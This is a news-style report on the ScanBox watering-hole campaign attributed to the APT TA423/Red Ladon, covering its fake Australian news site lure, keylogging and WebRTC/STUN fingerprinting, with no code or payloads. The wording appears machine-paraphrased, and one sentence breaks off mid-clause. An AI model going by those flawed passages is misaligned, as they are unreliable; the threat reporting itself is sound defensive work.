Experts have discovered a watering hole assault, probably executed by APT TA423, that tries to embed the ScanBox JavaScript-based surveillance device.
A cyber threat originating from China has intensified its operations to spread the ScanBox surveillance framework to targets including local Australian entities and offshore energy companies in the South China Sea. The advanced threat group (APT) employs a strategy of sending tailored messages that seemingly connect back to Australian news websites as a trap.
According to a recent report released on a Tuesday by Proofpoint’s Threat Research Team in collaboration with PwC’s Threat Intelligence team, it is suspected that the cyber-spying activities kicked off in April 2022 and continued until the middle of June 2022.
Research experts suggest that the possible threat initiator could be the APT TA423, also recognized as Red Ladon, originating from China. According to the report, Proofpoint moderately believes that the actions can possibly be linked to the threat initiator TA423/Red Ladon. Several reports confirm that this entity operates from Hainan Island, China.
The Advanced Persistent Threat (APT) has been making headlines due to a recent legal action. According to a 2021 formal accusation by the US Department of Justice, researchers suggest that TA423 / Red Ladon has been consistently aiding the Hainan Province Ministry of State Security (MSS).
MSS represents the non-military intelligence, cybersecurity, and security agency of the People’s Republic of China. It’s commonly assumed that this agency handles counter-intelligence and foreign intelligence activities, political safety, and is connected to China’s industrial and cyber spying endeavors.
Polishing Up the ScanBox
The campaign makes use of the ScanBox infrastructure. ScanBox is a versatile, tailor-made framework rooted in Javascript, employed by foes for executing undercover surveillance.
For close to ten years, antagonists have utilized ScanBox, a tool that stands out due to its ability to facilitate counter-intelligence operations. What makes it even more remarkable is that cybercriminals don’t need to infiltrate the target’s system with
What makes ScanBox especially threatening is its ability to pilfer data without needing to effectively install malware onto the disk – it simply needs its JavaScript code to be run through a web browser,” PwC researchers said while discussing a past campaign.
Instead of using malware, cybercriminals can employ ScanBox alongside a strategy known as watering hole attacks. The bad actors upload a harmful JavaScript to a breached website, where ScanBox operates like a keylogger, capturing all the activity that a user types on the infected site, otherwise known as the watering hole.
The assault initiated by TA423 kicked off with deceptive emails with subject lines like “Sick Leave,” “User Research,” and “Request Cooperation.” Frequently, these emails appeared to be from a staff member of the “Australian Morning News,” which is, in reality, a non-existent entity. The supposed employee would then beg the recipients to check out their so-called “modest news website,” australianmorningnews[.]com.
“When users clicked on the link and were redirected to the website, they encountered the ScanBox framework,” noted the experts.
The hyperlink led individuals to a webpage that had content duplicated from legitimate news platforms such as the BBC and Sky News. Simultaneously, it also transmitted the malicious software structure known as ScanBox.
Information harvested from waterholes through the ScanBox keylogger forms a segment of a multi-level assault, offering assailants useful insights into likely targets. These insights would then assist them in planning out future offensive strategies against these targets. This method is frequently referred to as browser fingerprinting.
The first, preliminary script gathers an array of data about the target computer, encompassing the operating system, language, and the installed Adobe Flash version. Besides, ScanBox performs an examination for browser additions, plugins, and elements like WebRTC.
“The module utilizes WebRTC, a complimentary and open-source technology that is compatible with all prominent browsers. This technology enables web browsers and mobile apps to carry out immediate communication (RTC) via application programming interfaces (APIs). This capability empowers ScanBox to link up with a series of predetermined targets,” as explained by the researchers.
Opponents can make use of a technology known as STUN, short for Session Traversal Utilities for NAT. This refers to a universal set of procedures, encompassing a network protocol, that enables interactive communication mediums such as real-time voice, video, and chat applications to pass through network address translator (NAT) gateways, as explained by the experts.
WebRTC protocol serves as a backbone for STUN. This is made possible with the help of a third-party STUN server that’s internet-based. What this server does is allow hosts to identify if a NAT is present, and to pinpoint the mapped IP address and port number that the NAT has set aside for the application’s UDP flows to distant hosts. ScanBox uses STUN servers to achieve NAT traversal, and this is part of the Interactive Connectivity Establishment (ICE). ICE is a method for peer-to-peer communication that aims for clients to connect as directly as possible, bypassing the need to go through NATs, firewalls, or other possible solutions, as per the findings of researchers.
In other words, the ScanBox module has the capacity to establish ICE interactions with STUN servers and can still connect with target systems, even if they’re protected by NAT, as explained.
Cyber Adversaries
The cyber adversaries are believed to be aiding the Chinese government on issues concerning the South China Sea, especially during the recent disturbances in Taiwan,” Sherrod DeGrippo, the lead at Proofpoint for threat research and detection, clarified in a statement. “This specific group seems to be interested in identifying those active in the area and, although we can’t confirm, their concentration on naval affairs is likely to persist as a continual focus in regions such as Malaysia, Singapore, Taiwan, and Australia.”
Historically, this organization has broadened its reach far beyond the region of Australasia. As per a legal accusation by the Department of Justice in July 2021, the group is alleged to have pilfered classified trade knowledge and proprietary business data from affected parties in various countries. These include the USA, Austria, Cambodia, Canada, Germany, Indonesia, Malaysia, Norway, Saudi Arabia, South Africa, Switzerland, and the UK. The industries that were targeted encompassed a wide range, such as aviation, defense, education, government, healthcare, biopharmaceutical, and maritime sectors, among others.
Even with the Department of Justice’s charges, experts haven’t seen a significant change in TA423’s operations. They unanimously predict that TA423, also known as Red Ladon, will carry on with its mission of collecting intelligence and engaging in espionage.
